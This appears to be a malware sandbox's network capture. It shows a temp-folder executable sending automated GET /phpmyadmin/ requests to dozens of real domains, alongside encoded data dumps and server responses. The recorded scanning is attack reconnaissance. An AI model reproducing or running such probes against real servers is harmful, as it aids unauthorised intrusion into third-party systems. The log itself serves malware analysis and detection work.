VwpIEoBSwoo4qFIBUUCFKmhSIAZGbTIYUMBFTxUqKCChwoVVPBQoYIKASrU3wMMk9RAAAB4AXTOA7BjMRSA4f+mXdu2bdu2jfqhuu1qtIO1bdu2bdu2bZ7BMoMvyWEwgLgctFzEUr1m/eYkdwUdkVSM6hLy4sYK8O0biQErsYlPYpKTmgxkIQd5KEARSlCGCr9VGsQgDglIQgrSkJGs5CQvBSlKScpSkbgY1ao0z0xhkHpFTOKSkKSkJC2ZyEYu
2024-02-20 23:26:05 UTC	8302	IN	Data Raw: 33 38 57 49 71 76 76 78 68 48 31 49 33 68 55 72 53 55 6e 64 2f 39 67 39 30 75 54 64 45 7a 51 78 6e 64 77 75 35 53 56 55 69 41 67 69 45 52 59 79 61 71 63 38 5a 48 5a 6b 41 55 73 79 4c 5a 74 44 43 6a 50 34 53 66 55 2f 30 46 46 2f 66 77 53 48 65 39 48 6b 2b 71 6e 4e 64 33 39 6b 58 77 50 2f 44 43 6e 35 42 61 59 69 55 51 41 52 59 6b 42 53 42 58 56 58 67 6c 49 49 4e 4c 49 62 65 56 76 61 4e 48 4e 75 4a 4f 59 46 72 56 2b 57 61 30 4d 43 4b 31 55 6f 54 49 44 51 6a 53 52 76 36 4e 52 66 38 4a 50 2f 69 6a 4f 76 47 76 70 30 41 50 70 36 66 73 50 6e 33 31 2f 61 4b 2f 6e 32 4e 44 6f 75 61 31 74 35 34 34 65 75 69 78 50 2f 54 59 65 78 72 37 44 37 78 6d 62 2f 39 2b 31 49 77 38 75 48 70 71 78 74 66 55 4d 58 4c 56 72 38 75 72 2b 34 33 76 48 4e 58 6c 63 77 2b 58 74 56 37 77 4d Data Ascii: 38WIqvvxhH1I3hUrSUnd/9g90uTdEzQxndwu5SVUiAgiERYyaqc8ZHZkAUsyLZtDCjP4SfU/0FF/fwSHe9Hk+qnNd39kXwP/DCn5BaYiUQARYkBSBXVXglIINLIbeVvaNHNuJOYFrV+Wa0MCK1UoTIDQjSRv6NRf8JP/ijOvGvp0APp6fsPn31/aK/n2NDoua1t544euixP/TYexr7D7xmb/9+1Iw8uHpqxtfUMXLVr8ur+43vHNXlcw+XtV7wM
2024-02-20 23:26:05 UTC	6676	IN	Data Raw: 50 64 33 65 7a 6e 32 49 73 6d 2b 41 6f 2b 51 39 36 4d 39 52 41 48 55 77 55 31 74 6a 75 4f 6a 63 54 74 4a 4f 41 73 2b 55 77 6d 4b 59 31 42 35 5a 70 4d 66 62 71 73 50 6a 54 53 65 38 4d 56 46 53 2b 59 64 62 63 33 2f 65 66 50 37 2f 2f 50 50 6c 77 63 51 66 35 30 51 74 66 75 50 2f 46 4c 39 35 66 46 4c 6e 79 42 4c 4b 55 6b 67 33 61 38 35 44 7a 77 69 42 65 32 4a 4b 59 38 65 53 70 71 39 70 63 53 69 62 64 78 46 49 2b 47 37 50 52 48 45 37 74 71 4a 72 50 47 65 6e 6a 34 46 6e 6e 65 4b 6b 35 6c 2b 76 4a 5a 6a 73 79 57 62 4b 4e 54 42 63 4b 30 78 75 47 74 37 32 33 2b 41 64 36 64 32 66 58 61 45 73 79 6e 55 2f 72 78 74 69 75 37 61 76 37 70 6c 65 4e 62 35 7a 41 63 62 53 7a 32 54 54 47 78 70 47 44 71 63 4a 6c 45 57 4a 61 58 55 51 33 2b 54 67 73 49 4e 59 35 30 45 33 44 31 49 Data Ascii: Pd3ezn2Ism+Ao+Q96M9RAHUwU1tjuOjcTtJOAs+UwmKY1B5ZpMfbqsPjTSe8MVFS+Ydbc3/efP7//PPlwcQf50QtfuP/FL95fFLnyBLKUkg3a85DzwiBe2JKY8eSpq9pcSibdxFI+G7PRHE7tqJrPGenj4FnneKk5l+vJZjsyWbKNTBcK0xuGt723+Ad6d2fXaEsynU/rxtiu7av7pleNb5zAcbSz2TTGxpGDqcJlEWJaXUQ3+TgsINY50E3D1I
2024-02-20 23:26:05 UTC	10674	IN	Data Raw: 49 2f 74 6e 4b 5a 39 69 4b 38 34 52 71 34 43 4f 48 7a 6e 36 77 4b 76 79 49 6c 35 63 62 42 53 39 64 70 6d 76 6c 6b 65 46 44 4c 7a 4f 5a 45 70 30 4b 48 76 49 6e 71 6b 55 51 46 54 2b 31 51 64 66 65 76 67 52 50 2f 38 61 57 73 36 48 71 4c 4a 32 64 57 4a 59 6e 6a 42 6c 32 77 73 32 75 56 61 2f 4c 76 62 4b 70 73 4f 47 41 4f 32 79 59 4b 64 47 70 6f 43 46 2f 6f 6b 72 6b 73 44 4f 52 62 6b 76 36 52 51 35 39 6c 50 55 56 73 57 43 6d 71 6a 49 33 4e 65 57 72 4d 63 55 66 7a 6e 58 73 39 66 47 4d 36 76 46 43 5a 48 61 56 45 2f 31 54 30 30 74 46 44 41 66 63 73 62 47 38 4e 31 4b 6f 6e 76 4c 47 44 45 58 48 6b 42 58 46 44 4a 63 51 77 38 74 39 5a 75 66 66 71 34 6a 46 4d 30 50 33 56 42 65 52 4c 75 55 6a 39 70 77 45 5a 4f 42 32 71 58 71 78 73 32 42 77 41 6d 65 63 6a 42 4a 36 4a 5a Data Ascii: I/tnKZ9iK84Rq4COHzn6wKvyIl5cbBS9dpmvlkeFDLzOZEp0KHvInqkUQFT+1QdfevgRP/8aWs6HqLJ2dWJYnjBl2ws2uVa/LvbKpsOGAO2yYKdGpoCF/okrksDORbkv6RQ59lPUVsWCmqjI3NeWrMcUfznXs9fGM6vFCZHaVE/1T00tFDAfcsbG8N1KonvLGDEXHkBXFDJcQw8t9Zuffq4jFM0P3VBeRLuUj9pwEZOB2qXqxs2BwAmecjBJ6JZ
2024-02-20 23:26:05 UTC	11860	IN	Data Raw: 76 50 37 74 50 47 37 54 33 6e 4b 2f 44 33 6b 56 64 38 37 66 50 68 37 6b 38 56 33 6b 51 4f 54 79 42 4f 30 4d 5a 6b 4e 4d 54 74 74 68 7a 50 6e 55 79 52 49 48 49 6e 6c 45 47 2b 61 65 51 34 77 48 7a 56 49 69 57 69 69 4e 43 65 78 63 49 4e 42 6d 48 65 79 49 37 4f 63 6b 48 33 41 4b 4b 69 75 6e 56 53 50 4b 44 49 73 56 32 6c 4c 4a 68 72 6c 43 4f 4d 64 36 45 62 52 75 56 54 57 59 42 61 36 79 6b 54 48 6e 31 4a 71 4a 49 44 53 32 62 64 76 7a 78 34 6d 72 2b 50 48 68 63 52 51 4f 69 2b 64 76 47 34 33 6b 39 64 31 6b 38 65 34 77 45 44 31 55 52 58 39 7a 52 48 70 78 74 4d 2f 77 64 50 61 58 4b 51 30 32 61 71 76 71 57 68 76 7a 6c 4b 31 47 35 5a 72 62 77 36 56 6e 55 32 2f 35 74 63 32 65 5a 2f 54 37 4e 53 54 70 4c 34 59 39 66 59 39 46 5a 69 2b 6d 4b 2f 65 43 2b 38 70 4e 4a 62 6e Data Ascii: vP7tPG7T3nK/D3kVd87fPh7k8V3kQOTyBO0MZkNMTtthzPnUyRIHInlEG+aeQ4wHzVIiWiiNCexcINBmHeyI7OckH3AKKiunVSPKDIsV2lLJhrlCOMd6EbRuVTWYBa6ykTHn1JqJIDS2bdvzx4mr+PHhcRQOi+dvG43k9d1k8e4wED1URX9zRHpxtM/wdPaXKQ02aqvqWhvzlK1G5Zrbw6VnU2/5tc2eZ/T7NSTpL4Y9fY9FZi+mK/eC+8pNJbn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	52008	86.105.245.69	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	177	OUT	GET /phpmyadmin/ HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	226	IN	HTTP/1.1 302 Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Location: https://www.stylesense.co.uk/phpmyadmin/
2024-02-20 23:26:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50932	15.197.204.56	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FbvEMrqsjKDRC9ThXAI+DHFNBovSsQ9JlX1bqPEGbPfUeADVtOBl/ZpevJZx36NBIs42EKJzgq2gvP+iLGYzkQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:05 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	51882	104.21.66.152	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	52009	103.224.182.253	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	271	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:05 GMT server: Apache set-cookie: __tad=1708471565.8886003; expires=Fri, 17-Feb-2034 23:26:05 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 168 content-type: text/html; charset=UTF-8 connection: close
2024-02-20 23:26:05 UTC	168	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 66 72 2e 61 75 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 09 3c 21 2d 2d 20 42 6c 61 6e 6b 20 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a Data Ascii: <html><head><title>fr.au</title><script type="text/javascript"></script></head><body bgcolor="#ffffff" text="#000000">... Blank --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	51764	23.236.62.147	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gmcocorp.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	792	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Length: 0 Connection: close location: https://www.gmcocorp.com/phpmyadmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471565.100735846452111403 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=uw2-pub-1 X-Seen-By: 9WD8GAcpJgs/Ng1WkD2i0h9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yx,2d58ifebGbosy5xc+FRalhKAdv/MXqn7990gNuLPN7p/UKfdkR/JAw2+Y0c1/View8k/qppaRC0Y49g+PYaWYg==,2UNV7KOq4oGjA5+PKsX47JTPcC9fSjIYSClzghCysK9jPZTuGyYqVhtmEIgJUb4w,R8nVwPJv9QJL1m78OROO+A7UK33n7eH/krKDcczJcFk=,9n3wTMzaU7zAZzBAj7gVU2fsKKH7sJn/p/6jQyzEpQr4D2PFRhC5HA4zrltzn4LTKTMwo2KvhzHL95EAOgxNKQ== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	51738	188.40.92.90	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	168	OUT	GET /phpmyadmin/ HTTP/1.1 Host: joaz.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	190	IN	HTTP/1.1 302 Found Alt-Svc: h3=":443"; ma=2592000 Location: https://www.domainmarkt.de/joaz.de Server: Caddy Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	51943	86.107.32.28	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: collevilca.it Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	245	IN	HTTP/1.1 403 Forbidden Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Server: BitNinja Captcha Server Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Length: 13695 Connection: close
2024-02-20 23:26:05 UTC	13695	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c Data Ascii: <!DOCTYPE HTML><html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><meta name="keywords" content="joomla, Joomla,

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	51898	213.186.33.4	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	176	OUT	GET /phpmyadmin/ HTTP/1.1 Host: art-paix-di.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	164	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Server: Apache
2024-02-20 23:26:05 UTC	196	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	52014	103.224.182.253	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	271	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:05 GMT server: Apache set-cookie: __tad=1708471565.1260916; expires=Fri, 17-Feb-2034 23:26:05 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 168 content-type: text/html; charset=UTF-8 connection: close
2024-02-20 23:26:05 UTC	168	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 66 72 2e 61 75 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 09 3c 21 2d 2d 20 42 6c 61 6e 6b 20 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a Data Ascii: <html><head><title>fr.au</title><script type="text/javascript"></script></head><body bgcolor="#ffffff" text="#000000">... Blank --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	51918	81.169.145.86	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	190	OUT	GET /phpmyadmin/ HTTP/1.1 Host: creativ-moebelwerkstaetten.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	51884	185.107.56.198	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.ph Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	432	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Tue, 20 Feb 2024 23:26:05 GMT location: https://ww2.affinity.net/fly?no_capp=2&enk=MjQyOTk1fDEyM3wxfDcxNjEyfDE3MDg0NzE1NjV8MXwxfDIwODk= server: Cowboy set-cookie: sid=6b05a2a8-d047-11ee-badc-b2ef52c56401; path=/; domain=.att.com.ph; expires=Mon, 10 Mar 2092 02:40:13 GMT; max-age=2147483647; secure; HttpOnly
2024-02-20 23:26:06 UTC	11	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	51900	85.13.138.112	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:05 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	51848	62.210.211.126	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	185	OUT	GET /phpmyadmin/ HTTP/1.1 Host: voltage-distribution.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	180	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 287 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:05 UTC	287	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6f 6c 74 61 67 65 2d 64 69 73 74 72 69 62 75 74 69 6f 6e 2e 63 6f 6d 20 50 6f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at voltage-distribution.com Po

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	52255	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	183	OUT	GET /phpmyadmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:05 GMT Connection: close
2024-02-20 23:26:05 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 